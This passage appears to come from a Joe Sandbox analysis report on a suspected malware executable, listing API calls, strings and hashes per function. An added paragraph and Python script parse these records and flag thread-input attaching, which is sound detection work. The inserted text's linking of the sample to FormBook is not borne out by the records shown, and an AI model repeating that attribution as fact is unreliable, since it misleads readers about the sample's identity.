                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,004A83D8), ref: 004486D6
                                                                              • IsMenu.USER32(?), ref: 004486EB
                                                                              • CreatePopupMenu.USER32 ref: 004486F5
                                                                              • InsertMenuItemW.USER32(?,?,00000001,004A83D8), ref: 00448739
                                                                              • DrawMenuBar.USER32 ref: 00448742
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                              • String ID: 0
                                                                              • API String ID: 176399719-4108050209
                                                                              • Opcode ID: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                              • Instruction ID: 98f94d81d6847d6484dd50bbdc77a0bd9f9f2d632c710d3394220f00cc789bef
                                                                              • Opcode Fuzzy Hash: 4add02930eb798c2c2cb68413aedc402262f89096725e95a36bc963f45c6c407
                                                                              • Instruction Fuzzy Hash: 86417675604201AFD700CF68D894A9BBBE4FF89314F14891EFA488B350DBB5A845CFA6
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469277
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469289
                                                                              • GetParent.USER32 ref: 004692A4
                                                                              • SendMessageW.USER32(00000000,?,00000111), ref: 004692A7
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 004692AE
                                                                              • GetParent.USER32 ref: 004692C7
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 004692CA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 2040099840-1403004172
                                                                              • Opcode ID: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                              • Instruction ID: ef07326ddff4210f4741e87947fad3c2ec39ee11b6619cfdf8cc81125e1c6f8c
                                                                              • Opcode Fuzzy Hash: d7a46b5f720fef199203ad69d051b39deebb3b2451f9d950c399d088bcf038a9
                                                                              • Instruction Fuzzy Hash: BC21D6716002147BD600AB65CC45DBFB39CEB85324F044A1FF954A73D1DAB8EC0947B9
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • SendMessageW.USER32(00000186,00000186,?,00000000), ref: 00469471
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 00469483
                                                                              • GetParent.USER32 ref: 0046949E
                                                                              • SendMessageW.USER32(00000000,?,00000111), ref: 004694A1
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 004694A8
                                                                              • GetParent.USER32 ref: 004694C1
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 004694C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 2040099840-1403004172
                                                                              • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                              • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                              • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                              • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                              APIs
                                                                                • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                              • SendMessageW.USER32(75C123D0,00001001,00000000,00000000), ref: 00448E73
                                                                              • SendMessageW.USER32(75C123D0,00001026,00000000,00000000), ref: 00448E7E
                                                                                • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                              • String ID:
                                                                              • API String ID: 3771399671-0
                                                                              • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                              • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                              • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                              • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                              • String ID:
                                                                              • API String ID: 3413494760-0
                                                                              • Opcode ID: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                              • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                              • Opcode Fuzzy Hash: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                              • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                              • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                              • String ID:
                                                                              • API String ID: 2156557900-0
                                                                              • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                              • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                              • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                              • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
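The record above is the function in which the sample calls GetForegroundWindow, resolves the owning thread, and issues AttachThreadInput three times with fAttach=1 and later three times with fAttach=0. That attach-then-detach sequence is the standard idiom for joining another thread's input queue so that focus and foreground changes succeed. As an added example, not part of the Joe Sandbox report and not code from the sample, the Python below parses a record in exactly the layout printed on this page (the sample input is constructed by copying the listing above) into call and field structures and flags that idiom. It assumes that the first three printed argument slots are the documented parameters (idAttach, idAttachTo, fAttach); the function and class names are the example's own.

```python
"""Parse Joe Sandbox per-function records and flag the AttachThreadInput
attach-then-detach idiom.  Added example; SAMPLE_RECORD is constructed by
copying the AttachThreadInput listing from the report."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

SAMPLE_RECORD = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 004377D7
• GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
• GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
• GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
Memory Dump Source
• Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
• Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
"""


@dataclass
class ApiCall:
    name: str                    # e.g. AttachThreadInput
    module: str                  # e.g. USER32
    args: List[str]              # stack slots as printed by the report ('?' = unknown)
    ref: str                     # call-site address (hex string)
    subcall: Optional[str] = None  # callee address when marked "Part of subcall function"


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: dict = field(default_factory=dict)          # "• Key: value" lines
    strings: List[Tuple[str, str]] = field(default_factory=list)  # (string, xref)


# "• [Part of subcall function ADDR: ]Name.MODULE[(args)][,] ref: ADDR"
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)$")


def parse_record(text: str) -> FunctionRecord:
    """Parse one function record; unbulleted lines are section headers."""
    rec = FunctionRecord()
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                rec.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif section == "Strings":
            s, sep, xref = line[1:].strip().rpartition(", xrefs: ")
            rec.strings.append((s, xref) if sep else (xref, ""))
        else:
            m = KV_RE.match(line)
            if m:
                rec.fields[m["key"]] = m["val"]
    return rec


def api_sequence(rec: FunctionRecord) -> List[str]:
    """Ordered API names, usable as a pivot key across samples."""
    return [c.name for c in rec.calls]


def has_attach_detach_idiom(rec: FunctionRecord) -> bool:
    """True if AttachThreadInput is called with fAttach=1 and later with fAttach=0.
    Assumption: the first three printed slots are idAttach, idAttachTo, fAttach."""
    attached = False
    for c in rec.calls:
        if c.name != "AttachThreadInput" or len(c.args) < 3:
            continue
        if c.args[2] == "00000001":
            attached = True
        elif c.args[2] == "00000000" and attached:
            return True
    return False


if __name__ == "__main__":
    r = parse_record(SAMPLE_RECORD)
    print(" -> ".join(api_sequence(r)))
    print("attach/detach idiom:", has_attach_detach_idiom(r), "|", r.fields["Opcode ID"])
```

Feeding every "APIs" record on the page through `parse_record` and keying on `api_sequence` or the `Opcode ID` field gives a quick way to match this function against other FormBook or AutoIt-packed submissions without re-deriving the fuzzy hashes.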
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll
                                                                              • String ID: 0%d$DOWN$OFF
                                                                              • API String ID: 3832890014-468733193
                                                                              • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                              • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                              • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                              • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                              • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                              • VariantClear.OLEAUT32 ref: 0045E970
                                                                              • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                              • __swprintf.LIBCMT ref: 0045EB1F
                                                                              • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                              • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                              Strings
                                                                              • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                              • String ID: %4d%02d%02d%02d%02d%02d
                                                                              • API String ID: 43541914-1568723262
                                                                              • Opcode ID: 11e75855299ae3405c424824ea34456a4e4a4cfcb6a1aa253e4cc896e09893c9
                                                                              • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                              • Opcode Fuzzy Hash: 11e75855299ae3405c424824ea34456a4e4a4cfcb6a1aa253e4cc896e09893c9
                                                                              • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                              APIs
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                              • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                              • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DecrementInterlocked$Sleep
                                                                              • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                              • API String ID: 2250217261-3412429629
                                                                              • Opcode ID: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                                                              • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                              • Opcode Fuzzy Hash: 7d20af892ce27232a3ff337619be48fed7d74e1bde2de334c7b49ab88d15dd8c
                                                                              • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                              • API String ID: 0-1603158881
                                                                              • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                              • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                              • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                              • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00479D1F
                                                                              • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                              • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                              • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                              • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                              • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                              • API String ID: 665237470-60002521
                                                                              • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                              • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                              • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                              • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                              APIs
                                                                                • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ConnectRegistry_wcslen
                                                                              • String ID: HH
                                                                              • API String ID: 535477410-2761332787
                                                                              • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                              • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                              • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                              • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0045F317
                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                              • IsMenu.USER32(?), ref: 0045F380
                                                                              • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                              • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                              • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                              • String ID: 0$2
                                                                              • API String ID: 3311875123-3793063076
                                                                              • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                              • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                              • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                              • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\r6lOHDg9N9.exe), ref: 0043719E
                                                                              • LoadStringW.USER32(00000000), ref: 004371A7
                                                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                              • LoadStringW.USER32(00000000), ref: 004371C0
                                                                              • _printf.LIBCMT ref: 004371EC
                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
